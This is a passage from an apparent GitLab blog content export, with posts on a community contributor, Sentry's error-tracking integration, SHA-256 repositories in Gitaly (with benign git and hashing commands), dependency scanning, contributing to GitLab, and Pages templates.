a city called [Yekaterinburg](https://www.google.com/maps/place/Yekaterinburg,+Sverdlovsk+Oblast,+Russia/@56.8138122,60.5145089,11z) in the Ural region of Russia. I love the nature here as it's not too hot in the summer and you will find good snow in the winter for snow boarding.\n\n### When did you first contribute to GitLab and why did you decide to contribute?\n\n[My first MR](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/6762) about two years ago was a pretty simple one as I removed unnecessary code from tests. I used GitLab Community Edition for my private projects and since I like open source software, I decided to look at the GitLab code base. When I found some areas for improvement mainly in tests, I decided to create my first MR.\n\n### Which areas of GitLab product have you been contributing to over the past two years?\n\nMost of my contributions have been on the backend side where I tried to improve the existing code base.\n\n### Can you tell us what you do professionally?\n\nI am a backend Ruby/Python developer and work at a company called [SKB Kontur](https://kontur.ru/eng/about).\n\n### What do you enjoy doing when you're not working?\n\nI have been a father for about six months, and I try to give as much of my free time to my daughter. I also like playing games on PlayStation 4 and my favorite game right now is FIFA 19. And of course, I like to contribute to open source projects.\n\n![Semyon's family](https://about.gitlab.com/images/blogimages/semyon-blogpost/semyon-family.JPG){: .shadow.small.center}\n\n### What can we do better to help GitLab community contributors?\n\nSometimes in issues/MRs, I find links to Zendesk tickets or Slack discussions that are private, and this can be frustrating for someone not working at GitLab. Also, it would be great if GitLab had a better setup for local development with Docker and Docker Compose. I found the branch in the [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) repository with [support for Docker Compose](https://gitlab.com/gitlab-org/gitlab-development-kit/tree/docker-compose), but it probably needs some updating. I recently submitted an [MR to help address this](https://gitlab.com/gitlab-org/gitlab-development-kit/merge_requests/592).\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nJust don't be afraid to get started. If you find places in the code that can be improved, you should make a contribution and in most cases your code will be welcomed and accepted.\n\nContributing to GitLab also allows you to work with a strong professional team. It's a good way to improve your skills while working on a great product.\n\n### Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":4695,"featured":6,"template":689},"semyon-pupkov-contributor-post","content:en-us:blog:semyon-pupkov-contributor-post.yml","Semyon Pupkov Contributor Post","en-us/blog/semyon-pupkov-contributor-post.yml","en-us/blog/semyon-pupkov-contributor-post",{"_path":4701,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4702,"content":4708,"config":4715,"_id":4717,"_type":14,"title":4718,"_source":16,"_file":4719,"_stem":4720,"_extension":19},"/en-us/blog/sentry-integration-blog-post",{"title":4703,"description":4704,"ogTitle":4703,"ogDescription":4704,"noIndex":6,"ogImage":4705,"ogUrl":4706,"ogSiteName":673,"ogType":674,"canonicalUrls":4706,"schema":4707},"Sentry's GitLab integration streamlines error remediation","Your code has bugs, my code has bugs, everyone’s code has bugs (probably). Let’s fix that.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679964/Blog/Hero%20Images/sentry-io-blog.jpg","https://about.gitlab.com/blog/sentry-integration-blog-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Streamline and shorten error remediation with Sentry’s new GitLab integration\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Eva Sasson\"}],\n        \"datePublished\": \"2019-01-25\",\n      }",{"title":4709,"description":4704,"authors":4710,"heroImage":4705,"date":4712,"body":4713,"category":10,"tags":4714},"Streamline and shorten error remediation with Sentry’s new GitLab integration",[4711],"Eva Sasson","2019-01-25","\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/KUHk1uuXWhA?rel=0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nSentry is open source error tracking that gives visibility across your entire stack and provides the details you need to fix bugs, ASAP. Because the only thing better than visibility and details is more visibility and details, Sentry improved their [GitLab integration](https://docs.sentry.io/workflow/integrations/global-integrations/gitlab/?utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) by adding [release](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) and [commit](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM#link-repository) tracking as well as [suspect commits](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM#after-linking-a-repository).\n\n### Streamline your workflow with issue management and creation\n\nWhen you receive an alert about an error, the last thing you want to do is to jump around 20 different tools trying to find out exactly what happened and where. Developers with both Sentry and GitLab in their application lifecycle benefit from issue management and issue creation to their GitLab accounts directly in the Sentry UI, alleviating some of the hassle of back-and-forth tool toggling.\n\n![GitLab account in Sentry](https://about.gitlab.com/images/blogimages/sentry/gitlab-sentry-integration.png){: .shadow.large.center}\n\nOf course, less tool jumping results in a more streamlined triaging process and shortened time to issue resolution – something that benefits the whole team.\n\n![Creating GitLab issue](https://about.gitlab.com/images/blogimages/sentry/create-gitlab-issue.png){: .shadow.medium.center}\n\nHave a GitLab issue that wasn’t created in Sentry? No problem. Existing issues are also easily linked.\n\n![Import GitLab issue](https://about.gitlab.com/images/blogimages/sentry/import-gitlab-issue.png){: .shadow.medium.center}\n\n### Find and fix bugs faster with release and commit tracking\n\nWhy stop at streamlining the triaging process, when we can also make issue resolution more efficient? Sentry’s GitLab integration now utilizes GitLab commits to find and fix bugs faster.\n\nWith the newly added release and commit tracking, an enhanced release overview page uncovers new and resolved issues, files changed, and authors. Developers can also resolve issues via commit messages or merge requests, see suggested assignees for issues, and receive detailed deploy emails.\n\nWant a big flashing arrow that points to an error’s root cause? Sentry’s suspect commits feature exposes the commit that likely introduced an error as well as the developer who wrote the broken code.\n\n![Suspect commits feature](https://about.gitlab.com/images/blogimages/sentry/suspect-commits-feature.png){: .shadow.medium.center}\n\nKeep in mind that this feature is available for Sentry users on “Teams” plans and above.\n{: .note}\n\nCheck out [Sentry’s GitLab integration documentation](https://docs.sentry.io/workflow/integrations/global-integrations/gitlab/?utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) to get started.\n\n### What’s next?\n\nAgain, why stop there, when we can do even more? GitLab is currently working to bring Sentry into the GitLab interface. Soon, GitLab and Sentry users will see their Sentry errors listed in their GitLab projects. Read the documentation on [the integration here](https://docs.gitlab.com/ee/operations/error_tracking.html).\n\n### About the guest author\n\nEva Sasson is a Product Marketer at [Sentry.io](https://sentry.io/welcome/), an open source error-tracking tool that gives developers the contextual information they need to resolve issues quickly, and integrates with the other development tools across the stack.\n",[109,779,685,231,9,865,953,910,686],{"slug":4716,"featured":6,"template":689},"sentry-integration-blog-post","content:en-us:blog:sentry-integration-blog-post.yml","Sentry Integration Blog Post","en-us/blog/sentry-integration-blog-post.yml","en-us/blog/sentry-integration-blog-post",{"_path":4722,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4723,"content":4728,"config":4733,"_id":4735,"_type":14,"title":4736,"_source":16,"_file":4737,"_stem":4738,"_extension":19},"/en-us/blog/sha256-support-in-gitaly",{"title":4724,"description":4725,"ogTitle":4724,"ogDescription":4725,"noIndex":6,"ogImage":1487,"ogUrl":4726,"ogSiteName":673,"ogType":674,"canonicalUrls":4726,"schema":4727},"GitLab Gitaly project now supports the SHA 256 hashing algorithm","Gitaly now supports SHA-256 repositories. Here's why it matters.","https://about.gitlab.com/blog/sha256-support-in-gitaly","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Gitaly project now supports the SHA 256 hashing algorithm\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2023-08-28\",\n      }",{"title":4724,"description":4725,"authors":4729,"heroImage":1487,"date":4730,"body":4731,"category":930,"tags":4732},[1512],"2023-08-28","\nWe've taken a huge step in SHA-256 support in GitLab: The [Gitaly](https://gitlab.com/gitlab-org/gitaly) project now fully supports SHA-256 repositories. While there is [still some work](https://gitlab.com/groups/gitlab-org/-/epics/10981) we need to do in other parts of the GitLab application before SHA-256 repositories can be used, this milestone is important.\n\n## What is SHA-256?\nSHA-256 is a [hashing algorithm](https://about.gitlab.com/handbook/security/cryptographic-standard.html#algorithmic-standards). Given an input of data, it produces a fixed-length hash of 64 characters with hexadecimal digits. Git uses hashing algorithms to generate IDs for commits and other Git objects such as blobs,\ntrees, and tags.\n\nGit uses the SHA-1 algorithm by default. If you've ever used Git, you know that\ncommit IDs are a bunch of hexademical digits. A `git log` command yields\nsomething like the following:\n\n```\ncommit bcd64dba39c90daee2e1e8d9015809b992174e34 (HEAD -> main, origin/main, origin/HEAD)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Wed Jul 26 13:41:34 2023 -0400\n\n    Fix README.md\n```\n\nThe `bcd64dba39c90daee2e1e8d9015809b992174e34` is the ID of the commit and is a\n40-character hash generated by using the SHA-1 hashing algorithm.\n\nIn SHA-256 repositories, everything is the same except, instead of a 40-character\nID, it's now a 64-character ID:\n\n```\ncommit e60501431d52f6d06b4749cf205b0dd09141ea0b3155a45b9246df24eee9b97b (HEAD -> master)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Fri Jul 7 12:56:52 2023 -0400\n\n    Fix README.md\n```\n\n### Why SHA-256?\nSHA-1, which has been the algorithm that has been used until now in Git, is\ninsecure. In 2017, [Google was able to produce a hash collision](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html). While the Git project is not yet impacted by these kinds of attacks due to the\nway it stores objects, it is only a matter of time until new attacks on SHA-1\nwill be found that would also impact Git.\n\nFederal regulations such as NIST and CISA [guidelines](https://csrc.nist.gov/projects/hash-functions/nist-policy-on-hash-functions),\nwhich [FedRamp](https://www.fedramp.gov/) enforces, set a due date in 2030 to\nstop using SHA-1, and encourage agencies to move away from it sooner if\npossible.\n\nIn addition, SHA-256 has been labeled experimental in the Git project for a long time,\nbut as of Git 2.42.0, the project has decided to [remove the experimental label](https://github.com/git/git/blob/master/Documentation/RelNotes/2.42.0.txt#L41-L45).\n\n### What does this mean for developers?\nFrom a usability perspective, SHA-256 and SHA-1 repositories really don't have a\nsignificant difference. For personal projects, SHA-1 is probably fine. However,\ncompanies and organizations are likely to switch to using SHA-256 repositories\nfor security reasons.\n\n### See SHA-256 in action\nIf you have `sha256sum(1)` installed, you can generate such a hash on the command line:\n\n```\n> printf '%s' \"please hash this data\" | sha256sum\n62f73749b40cc70f453320e1ffc37e405ba50474b5db68ad436e64b61fbb8cf0  -\n```\n\nWe can also see this in action in a Git repository. Let's create a repository,\nadd an initial commit, and inspect the contents of the commit object. **Note:** If\nyou try this yourself, the commit IDs will be different because the date of the\ncommit is part of the hash calculation.\n\n```\n> git init test-repo\n> cd test-repo\n> echo \"This is a README\" >README.md\n> git add .\n> git commit -m \"README\"\n[main (root-commit) 328b61f] README\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\n> zlib-flate -uncompress \u003C ./git/objects/32/8b61f2449205870f69b5981f58bd8cdbb22f95\ncommit 159tree 09303be712bd8e923f9b227c8522257fa32ca7dc\nauthor John Cai \u003Cjcai@gitlab.com> 1688748132 -0400\ncommitter John Cai \u003Cjcai@gitlab.com> 1688748132 -0400\n\nREADME\n```\n\nIn the last step, we uncompress the actual commit file on disk. Git zlib compresses object\nfiles before storing them on disk.\n\n`zlib-flate(1)` is a utility that comes packaed with `qpdf` that uncompresses zlib compressed files.\n\nNow, if we feed this data back into the SHA-1 algorithm, we get a predictable result:\n\n```\n> zlib-flate -uncompress \u003C .git/objects/32/8b61f2449205870f69b5981f58bd8cdbb22f95 | sha1sum\n328b61f2449205870f69b5981f58bd8cdbb22f95  -\n```\n\nAs we can see, the result of this is the commit ID.\n\nThe recommendation by NIST was to replace SHA-1 with SHA-2 or SHA-3. The\nGit project has [undergone this effort](https://git-scm.com/docs/hash-function-transition/),\nand the current state of the feature is that it's fully usable in Git and no\nlonger deemed experimental.\n\nIn fact, you can create and use repositories with SHA-256 as the hashing algorithm\nto see it in action on your local machine:\n\n```\n> git init --object-format=sha256 test-repo\n> cd test-repo\n> echo \"This is a README\" >README.md\n> git add .\n> git commit -m \"README\"\n[main (root-commit) e605014] README\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\n> git log\ncommit e60501431d52f6d06b4749cf205b0dd09141ea0b3155a45b9246df24eee9b97b (HEAD -> master)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Fri Jul 7 12:56:52 2023 -0400\n\n    README\n\n```\n\n",[751,930,9,267],{"slug":4734,"featured":91,"template":689},"sha256-support-in-gitaly","content:en-us:blog:sha256-support-in-gitaly.yml","Sha256 Support In Gitaly","en-us/blog/sha256-support-in-gitaly.yml","en-us/blog/sha256-support-in-gitaly",{"_path":4740,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4741,"content":4747,"config":4751,"_id":4753,"_type":14,"title":4754,"_source":16,"_file":4755,"_stem":4756,"_extension":19},"/en-us/blog/software-dependencies-tech-debt",{"title":4742,"description":4743,"ogTitle":4742,"ogDescription":4743,"noIndex":6,"ogImage":4744,"ogUrl":4745,"ogSiteName":673,"ogType":674,"canonicalUrls":4745,"schema":4746},"Don’t let your dependency-laden software become the next monolith","Keep your software development fast and efficient with dependency scanning and auto-remediation.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678488/Blog/Hero%20Images/software-dependencies-monolith.jpg","https://about.gitlab.com/blog/software-dependencies-tech-debt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Don’t let your dependency-laden software become the next monolith\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n        \"datePublished\": \"2019-09-09\",\n      }",{"title":4742,"description":4743,"authors":4748,"heroImage":4744,"date":1217,"body":4749,"category":682,"tags":4750},[1916],"\nDependencies are a great tool for developers: They save time, which saves money\nand helps meet the need for speed when developing. But with great dependencies\ncomes great responsibility because it’s easy to accumulate tech debt in the form\nof dependencies. What happens when you need to alter a line of code? Does it\nbreak your software? What is the cost of fixing a bug, updating dependencies,\nor adding a new module? Suddenly your software management starts to resemble the\nstruggles of a monolithic architecture, where changing one small piece can break\neverything.\n\n## Software dependencies are like bricks, but flammable\n\nEach module added to your software can be thought of like a brick: Small parts\nof a greater whole. But now imagine that those bricks are highly flammable. You\nhave a significant chance of catastrophe with the tiniest of sparks.\n\nThat spark could be a single code change, [deleted code like the LeftPad\nincident](https://www.businessinsider.com/npm-left-pad-controversy-explained-2016-3),\na corrupted library, a missed patch, or patch that forces updates to all your\nother dependencies. There’s also the issue of security flaws – when a bug is\nfound, the whole open source community is in the know, and that applies to\nhackers as well. Popular dependencies [can quickly become targets](https://www.aptible.com/blog/vulnerability-scanning-for-your-dependencies-why-and-how)\nas soon as the news of a patch is released. Another common risk of all third-party software and code are [zero-day attacks](https://www.csoonline.com/article/3284084/what-is-a-zero-day-a-powerful-but-fragile-weapon.html),\nwhen a previously unknown vulnerability is exploited by hackers before a patch\nor update is applied.\n\n## Software dependency scanning: Your firetruck dispatch\n\nDependency scanners have risen in popularity and breadth in recent years,\nproving themselves useful tools for incident prevention. Scanners generally\nprovide a list of all the dependencies within your code or app, along with a\nlist of all the known vulnerabilities within each dependency. Scans can be done\nmanually or automatically. Users can [set up scans that run automatically within GitLab](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), which is helpful for code that\nisn’t updated often.\n\nDependency scanners can also be used to look for redundancies within projects\nthat have been worked on or updated without a detailed changelog, or over a\nlong period of time. Simplifying your dependencies will reduce the risk of a\ncode change chain reaction, and will also reduce your attack surface.\n\n## Auto-remediation: The all-in-one fire prevention and firehose tool\n\n[Auto-remediation tools](/direction/secure/#auto-remediation)\ncan find vulnerabilities within your code, evaluate the scope of any problems,\nand propose a solution. Developers can even set up auto-remediation tools to\napply solutions under defined circumstances, shortening the time the vulnerability window\nis open to cyber assailants. Once that fix is automatically created, next it is\ntested. If it passes all the tests defined for your application, the fix is then\ndeployed to production.\n\nAuto-remediation tools can also help verify that changes made in dependency\nupdates didn’t break any parts of your application – kind of like making sure\nyou’ve turned off the stove before leaving the house.\n\n## Build your house by laying each brick with intention\n\nDependencies help simplify coding, but they add complexity when it comes to\nmanaging the bigger picture. So it is crucial to understand what\ndependencies you have, where you can simplify, and how your current and new\ndependencies will affect your software in the future. Take command of your\ndependencies with tools like dependency scanners and auto-remediation, and use\nthat information and experience to build future software with efficiency and\nintention.\n\nCover photo by [Grace Kadiman](https://unsplash.com/@gracekadiman?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\non [Unsplash](https://unsplash.com/search/photos/brick-laying?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,865],{"slug":4752,"featured":6,"template":689},"software-dependencies-tech-debt","content:en-us:blog:software-dependencies-tech-debt.yml","Software Dependencies Tech Debt","en-us/blog/software-dependencies-tech-debt.yml","en-us/blog/software-dependencies-tech-debt",{"_path":4758,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4759,"content":4765,"config":4770,"_id":4772,"_type":14,"title":4773,"_source":16,"_file":4774,"_stem":4775,"_extension":19},"/en-us/blog/start-contributing-to-gitlab-today",{"title":4760,"description":4761,"ogTitle":4760,"ogDescription":4761,"noIndex":6,"ogImage":4762,"ogUrl":4763,"ogSiteName":673,"ogType":674,"canonicalUrls":4763,"schema":4764},"Start contributing to GitLab today","Learn how to start contributing to GitLab and how GitLab team members are here to help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749676361/Blog/Hero%20Images/collaboration.jpg","https://about.gitlab.com/blog/start-contributing-to-gitlab-today","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Start contributing to GitLab today\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rémy Coutable\"}],\n        \"datePublished\": \"2020-09-30\",\n      }",{"title":4760,"description":4761,"authors":4766,"heroImage":4762,"date":2754,"body":4768,"category":951,"tags":4769},[4767],"Rémy Coutable","\n{::options parse_block_html=\"true\" /}\n\nAt GitLab, [everyone can contribute](https://about.gitlab.com/company/mission/#mission). This has been our mission from day\none, since GitLab started as --and is still-- an open-source project.\n\nWe believe that, when consumers become contributors, it benefits everyone: GitLab the product, GitLab the company, GitLab the community\nas well as all GitLab users all around the world.\n\nWe already merged more than 7,700 [“community contribution”](https://gitlab.com/groups/gitlab-org/-/merge_requests?label_name%5B%5D=Community+contribution&state=merged) merge requests from our wider community (at the `gitlab-org` group level).\n\n![Screenshot showing more than 7,700 merged community MRs](https://about.gitlab.com/images/blogimages/2020-09-30-community-contributions.png){: .shadow.medium.center}\n*\u003Csmall>Merge requests from community members not employed by GitLab (aka from the GitLab wider community)\u003C/small>*\n\n## Contributing tracks\n\nNow, it's your turn to contribute and improve GitLab! Since not everyone share the same interests nor competencies, we\nhave multiple tracks to ensure everyone can contribute:\n\n- [Development (new features, bug fixes, performance improvements)](/community/contribute/development/)\n- [Documentation addition, improvements, and fixes](/community/contribute/documentation/)\n- [Translations](/community/contribute/translation/)\n- [UX design](https://about.gitlab.com/community/contribute/ux-design/)\n- [Project templates](/community/contribute/project-templates/)\n\nWhen you're ready, simply choose the track for you and follow the instructions.\n\n## Start small...\n\nTo get familiar with the merge request workflow, I advise you start small.\n[Fixing a typo](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/42447) or\n[adding a comma](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/43021) in the documentation are small yet awesome\ncontributions that are usually merged in a matter of hours. These are awesome to gear up and get the ball rolling.\n\nFor more examples, be sure to take a look at the [community merge requests that touched GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/merge_requests?state=merged&label_name[]=documentation&label_name[]=Community%20contribution).\n\nThese kind of changes don't require a lot of time from you, but if you have more time and are ready to tackle bigger challenges,\nyou can start looking for [bugs](https://gitlab.com/gitlab-org/gitlab/-/issues?label_name%5B%5D=Accepting+merge+requests&label_name[]=type::bug&scope=all&sort=popularity&state=opened)\nor [feature proposals](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Accepting%20merge%20requests&label_name[]=feature).\n\n## ...and end up MVP\n\nEvery contribution is a collaborative effort between the merge request author, the reviewer(s), potentially MR coaches, and the maintainer (who gets to merge the MR).\n\nSome contributions are so complex and technical that they take months of collaboration to get accross the finish line!\n\nLet's give you a few examples of great collaborative efforts that happened in the last 12 months:\n\n1. [Cédric Tabin](https://gitlab.com/ctabin) worked for more than 9 months contributing\n   [a new CI job keyword allowing interruptible builds](/releases/2019/09/22/gitlab-12-3-released/#interruptible-keyword-to-indicate-if-a-job-can-be-safely-canceled)\n   and working with the GitLab teams to get it across the line. The [merge request](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/23464) involved 51 people, who posted 405 discussion notes!\n   This contribution was released in GitLab 12.3, and allows to save a lot of money by avoiding running redundant pipelines.\n1. [Tuomo Ala-Vannesluoma](https://gitlab.com/tuomoa) worked for 7 months adding support for\n   [previewing artifacts that are not public](/releases/2019/10/22/gitlab-12-4-released/#private-project-support-for-online-view-of-html-artifacts), a highly requested feature with almost 300 upvotes!\n   The [merge request](https://gitlab.com/gitlab-org/gitlab-pages/-/merge_requests/134) landed in GitLab 12.4, and received two 🍾 emoji votes.\n1. [Roger Meier](https://gitlab.com/bufferoverflow) worked for more than 4 months contributing\n   [support for S/MIME Signature Verification of Commits](/releases/2020/02/22/gitlab-12-8-released/#smime-signature-verification-of-commits), an important feature for sensitive projects and in regulated industries.\n   Roger's teammate, [Henning Schild](https://gitlab.com/henning-schild), contributed the change upstream to Git and Roger made the change in GitLab.\n   The [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/17773) involved 42 people, who posted 430 discussion notes, and landed in GitLab 12.8.\n1. [Steve Exley](https://gitlab.com/steve.exley) worked for more than 5 months contributing one of\n   [the biggest architectural changes to the Docker executor](/releases/2020/03/22/gitlab-12-9-released/#gitlab-runner-129).\n   that solved multiple issues for the Docker executor, including [jobs sharing the same network bridge](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4430),\n   [services don't work when `network_mode` is specified](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2699),\n   and lastly, services can connect to one another and connect with the build container as well!\n   The [merge request](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1569) involved 69 people, who posted 293 discussion notes. It landed in GitLab 12.9, and received five 🔥 emoji votes.\n1. [Jesse Hall](https://gitlab.com/jessehall3) worked for more than 5 months contributing one of\n   [the Batch Suggestions feature](/releases/2020/07/22/gitlab-13-2-released/#batch-suggestions) which allows MR reviewers to group all suggestions made to a diff and submit them at once.\n   Because each suggestion translates into a Git operation, submitting these individually could take a long time if there were a large number of suggestions. Submitting suggestions in batches has numerous advantages, including time savings, efficient CI resource utilization (only one pipeline for all suggestions), and preventing an overly noisy Git history.\n   The [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/22439) involved 38 people, who posted 358 discussion notes. It landed in GitLab 13.2, and received seven 💚 emoji votes.\n\n## Get some help from the GitLab team\n\nIf you need any help while contributing to GitLab, below are some of the resources that are available.\n\n1. Ask questions on the [Contributors Gitter Channel](https://gitter.im/gitlabhq/contributors).\n1. Get in touch with [Merge Request Coaches](https://handbook.gitlab.com/job-families/expert/merge-request-coach/). To find a merge request coach, go to the GitLab Team Page and search for \"Merge Request Coach\".\n   You can also mention Merge Request Coaches by typing `@gitlab-org/coaches` in a comment.\n1. Find reviewers & maintainers of Gitlab projects in our [handbook](/handbook/engineering/projects/#gitlab) and [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) them in a comment.\n1. If you have feature ideas/questions, you can search for existing issues or create a new issue if there isn't one already. Feel free to [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) [product team members](/handbook/product/categories/) in the issue.\n\nWait for a reviewer. You’ll likely need to change some things once the reviewer has completed a code review for your merge request.\nYou may also need multiple reviews depending on the size of the change.\nIf you don't hear from anyone in a timely manner, feel free to find reviewers or reach out to Merge Request Coaches.\nPlease don't be shy about [mentioning](https://docs.gitlab.com/ee/user/project/issues/index.html)\nGitLab team members in your merge requests as all team members are expected to be responsive to fellow community members.\n\n## How we stay on top of community contributions\n\nIn Q3 of 2020, several GitLab teams are focusing on improving the experience for community contributors. To achieve this goal,\nwe created a few metrics around community contributions:\n\n* [Community Contribution Mean Time to Merge](/handbook/engineering/quality/performance-indicators/#community-contribution-mean-time-to-merge)\n* [Unique Community Contributors per Month](/handbook/engineering/quality/performance-indicators/#unique-community-contributors-per-month)\n* [Community MR Coaches per Month](/handbook/engineering/quality/performance-indicators/#community-mr-coaches-per-month)\n\nTo make sure the GitLab team is working hand in hand with the wider community in a timely fashion, we've already put a few automations in place:\n\n1. Every hour, wider community contributions are automatically [labelled \"Community contribution\"](/handbook/engineering/quality/triage-operations/#community-contributions).\n1. Every day, a report with the [untriaged](/handbook/engineering/quality/merge-request-triage/) community merge requests is created and assigned to the Merge Request Coaches for triage. This ensures each merge request has a [stage and group](/handbook/product/categories/#hierarchy) labels set.\n1. Every two weeks, a report with unassigned and idle community contributions is created for each [group](/handbook/product/categories/#hierarchy).\n\nThese automations are powered by our [`triage-ops` project](https://gitlab.com/gitlab-org/quality/triage-ops/) and are documented in [Triage Operations](/handbook/engineering/quality/triage-operations/).\n\nI hope this post convinced you to start contributing to GitLab. Keep in mind, any contribution is valuable, and don't worry, we're here to support you.\n\nCover image: [\"Żuki leśne na liściu jesienią\"](https://unsplash.com/photos/5S2xIoNpcGk) by [Krzysztof Niewolny](https://unsplash.com/@epan5).\n{: .note}\n",[779,267,708,803,9],{"slug":4771,"featured":6,"template":689},"start-contributing-to-gitlab-today","content:en-us:blog:start-contributing-to-gitlab-today.yml","Start Contributing To Gitlab Today","en-us/blog/start-contributing-to-gitlab-today.yml","en-us/blog/start-contributing-to-gitlab-today",{"_path":4777,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4778,"content":4784,"config":4789,"_id":4791,"_type":14,"title":4792,"_source":16,"_file":4793,"_stem":4794,"_extension":19},"/en-us/blog/start-using-pages-quickly",{"title":4779,"description":4780,"ogTitle":4779,"ogDescription":4780,"noIndex":6,"ogImage":4781,"ogUrl":4782,"ogSiteName":673,"ogType":674,"canonicalUrls":4782,"schema":4783},"New: How to get up and running quickly using GitLab Pages templates","We're introducing bundled GitLab Pages templates, so let's take a look at how easy it really is now to get up and running with a new site.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679908/Blog/Hero%20Images/pages-templates-cover-image.jpg","https://about.gitlab.com/blog/start-using-pages-quickly","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"New: How to get up and running quickly using GitLab Pages templates\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Yavorska\"}],\n        \"datePublished\": \"2019-02-20\",\n      }",{"title":4779,"description":4780,"authors":4785,"heroImage":4781,"date":4786,"body":4787,"category":801,"tags":4788},[2288],"2019-02-20","\n\nHello everyone, my name is Jason Yavorska and I'm the product manager for the [Release stage](/stages-devops-lifecycle/release/) here at GitLab, which includes GitLab Pages. In our [GitLab 11.8 release (March 2019) we're introducing](https://gitlab.com/gitlab-org/gitlab-ce/issues/47857) a quick way to select from our most popular [Pages templates](https://gitlab.com/pages?sort=stars_desc) directly from the new project setup screen. If you use GitLab.com, you can take advantage of this feature already! It looks a bit like this:\n\n![Pages Templates View](https://about.gitlab.com/images/blogimages/pages-templates-view.png){: .shadow.medium.center}\n\nNow, instead of having to fork an existing template, you can simply select one of the bundled ones and get going right away. If you're interested in one of the other templates, you can still create those in the old way – check out the [existing documentation on how to fork a template](https://docs.gitlab.com/ee/user/project/pages/index.html#fork-a-project-to-get-started-from).\n\nIn this article I'm going to show you just how effortless all of this can be. But first:\n\n## My experience contributing GitLab Pages templates\n\nFirst, though, I'd be remiss if I didn't mention that I contributed this change myself (with the help of a few key supporting players, of course.) Now, you may be wondering: I thought you were a product manager at GitLab? Not a developer? Well, that's absolutely true, but I am a hobbyist programmer on the side. I've contributed a small change here or there on my own time, but this was the largest, most complex thing that I've ever contributed myself.\n\nI always find in these situations that contributing is in some ways easier than you expect, and in some ways more challenging. Getting the code working was actually surprisingly straightforward: I was able to get our GDK ([GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/master/README.md)) up and running with minimal hassle, and then was able to iterate quickly until I found a working solution. Most of my challenges ended up being around getting the change through our review process and into the release. There's a lot you have to learn there, and I think it just takes some time and practice in order to have it all click. What was truly amazing, though, was all the friendly people who jumped in to help me along the way. I learned so much and am so proud of how everything came together in the end.\n\nIf you're considering making your first contribution, feel free to reach out to me on Twitter ([@j4yav](https://twitter.com/j4yav)) and I'll be happy to help guide you in the right direction. Contributing to open source is a great feeling, big or small, and if you haven't tried it before you should really give it a go.\n\n## Now let's set up a site!\n\nWith that out of the way, let's see this in action to appreciate just how painless it really is to set up a new site in GitLab pages now.\n\nThe video below walks through the steps, with full instructions underneath.\n\n Note that if you're using a private on-premise version of GitLab, be sure to check with your administrator to ensure that Pages is enabled. You may need to adjust some of the URLs in the setup below depending on your site configuration.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://youtube.com/embed/C2E1M-4Jvd0\" frameborder=\"0\" 